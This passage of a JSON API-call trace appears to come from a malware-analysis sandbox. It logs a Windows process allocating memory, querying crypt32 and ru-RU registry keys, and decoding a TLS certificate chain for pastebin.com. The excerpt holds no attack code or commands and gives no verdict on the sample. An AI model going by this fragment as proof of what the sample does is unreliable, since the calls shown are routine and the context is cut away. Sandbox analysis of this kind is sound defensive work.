            "id": 1683
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d64000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1684
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d69000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1685
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34a84c4",
            "parentcaller": "0x7ffee34bd136",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 1686
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb2a",
            "parentcaller": "0x7ffee34bb99e",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000538"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\CRYPT32.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1687
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb82",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000053c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000538"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\crypt32.dll.mui"
              }
            ],
            "repeated": 0,
            "id": 1688
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbcc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000053c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02f10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x06d5dd90"
              },
              {
                "name": "ViewSize",
                "value": "0x0000c000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1689
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbdc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000053c"
              }
            ],
            "repeated": 0,
            "id": 1690
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d6c000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1691
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d6e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1692
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0ce9000"
              },
              {
                "name": "ModuleName",
                "value": "CRYPT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1693
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0ce9000"
              },
              {
                "name": "ModuleName",
                "value": "CRYPT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1694
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee14e6f25",
            "parentcaller": "0x7ffee14e4f88",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000178"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\KsecDD"
              },
              {
                "name": "IoControlCode",
                "value": "0x00390400"
              },
              {
                "name": "InputBuffer",
                "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "OutputBuffer",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00A\\x002\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffS\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00s\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1695
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffee14e1bc4",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "bcryptPrimitives.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1390000"
              },
              {
                "name": "FunctionName",
                "value": "GetHashInterface"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee13a4460"
              }
            ],
            "repeated": 0,
            "id": 1696
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bac99e",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03\\xa60\\x82\\x03L\\xa0\\x03\\x02\\x01\\x02\\x02\\x11\\x00\\xfc_eMG\\x92\\xa06\\x0eoE4\\xb9\\xf3\\x11\\xe70\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x020;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10\\x1e\\x17\r251119161223Z\\x17\r260217171220Z0\\x171\\x150\\x13\\x06\\x03U\\x04\\x03\\x13\\x0cpastebin.com0Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\t\\xd6\\xc7\\xed\\x85GCf\\x9b|p\\xd2\\x95\\xe4\\xfb\\x87\\xa8\\xb8\\xca\\x86E\\x1d5Qu7\\xdeA%\\xae\\x1cS\\x03\\x8b\\xa6\\xf7wT\\xfb\\xf9\\xa7Oh\\xe6,\\x8c l\\xcf\\x16\\xa2\\x1e)b\\xa8v%\\x88e\\xdbl\\x8c\\x80\\xe2\\xa3\\x82\\x02"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1697
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bac99e",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x02\\x9f0\\x82\\x02%\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xf3\\x19w\\x97,\"Jv\\x15]\\x13\\xb6\\xd6\\x85\\xe30\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40\\x1e\\x17\r231213090000Z\\x17\r290220140000Z0;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04o\\xcd:\\xfegWGL!\\x03\\x85@\\xc2G]\\xbbXG\\x0f@"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1698
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bac99e",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03z0\\x82\\x02b\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xe50\\xbf3\\x13C\\xbe\\xdd\\x82\\x16\\x10I=\\x8a\\x1b0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x1e\\x17\r231115034321Z\\x17\r280128000042Z0G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40v0\\x10\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x05+"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1699
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffec7816000"
              },
              {
                "name": "ModuleName",
                "value": "webio.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1700
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffec7816000"
              },
              {
                "name": "ModuleName",
                "value": "webio.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1701
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bca81a",
            "parentcaller": "0x7ffee0bca5cf",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SYSTEM\\CurrentControlSet\\Services\\crypt32"
              },
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32"
              }
            ],
            "repeated": 0,
            "id": 1702
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bca86c",
            "parentcaller": "0x7ffee0bca5cf",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "ValueName",
                "value": "DiagLevel"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel"
              }
            ],
            "repeated": 0,
            "id": 1703
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bca8bf",
            "parentcaller": "0x7ffee0bca5cf",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "ValueName",
                "value": "DiagMatchAnyMask"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask"
              }
            ],
            "repeated": 0,
            "id": 1704
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bca8f8",
            "parentcaller": "0x7ffee0bca5cf",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              }
            ],
            "repeated": 0,
            "id": 1705
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bca600",
            "parentcaller": "0x7ffee0bba48e",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SYSTEM\\CurrentControlSet\\Services\\crypt32"
              },
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32"
              }
            ],
            "repeated": 0,
            "id": 1706
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bca65d",
            "parentcaller": "0x7ffee0bba48e",
            "category": "registry",
            "api": "RegNotifyChangeKeyValue",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\"
              },
              {
                "name": "NotifyFilter",
                "value": "0x10000004"
              },
              {
                "name": "WatchSubtree",
                "value": "0"
              },
              {
                "name": "Asynchronous",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 1707
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0ce9000"
              },
              {
                "name": "ModuleName",
                "value": "CRYPT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1708
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0ce9000"
              },
              {
                "name": "ModuleName",
                "value": "CRYPT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1709
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34e74ae",
            "parentcaller": "0x7ffee110dddb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1710
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34e74b7",
            "parentcaller": "0x7ffee110dddb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1711
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "4536",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d70000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1712
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c54eb",
            "parentcaller": "0x7ffee0baa075",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1713
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee0baa0a1",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1714
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0b9c6e9",
            "parentcaller": "0x7ffee0b9c63d",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config"
              }
            ],
            "repeated": 0,
            "id": 1715
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0b9c682",
            "parentcaller": "0x7ffee0b9c60e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "DisableSerialChain"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain"
              }
            ],
            "repeated": 0,
            "id": 1716
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0b9c699",
            "parentcaller": "0x7ffee0b9c60e",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1717
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0ba21cf",
            "parentcaller": "0x7ffee0ba4357",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 1,
            "id": 1718
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0b9c6e9",
            "parentcaller": "0x7ffee0ba1baa",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config"
              }
            ],
            "repeated": 0,
            "id": 1719
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0b9fead",
            "parentcaller": "0x7ffee0b9ded9",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "CryptnetPreFetchTriggerPeriodSeconds"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds"
              }
            ],
            "repeated": 0,
            "id": 1720
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0b9fead",
            "parentcaller": "0x7ffee0b9def9",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "MaxUrlRetrievalByteCount"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount"
              }
            ],
            "repeated": 0,
            "id": 1721
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0ba176e",
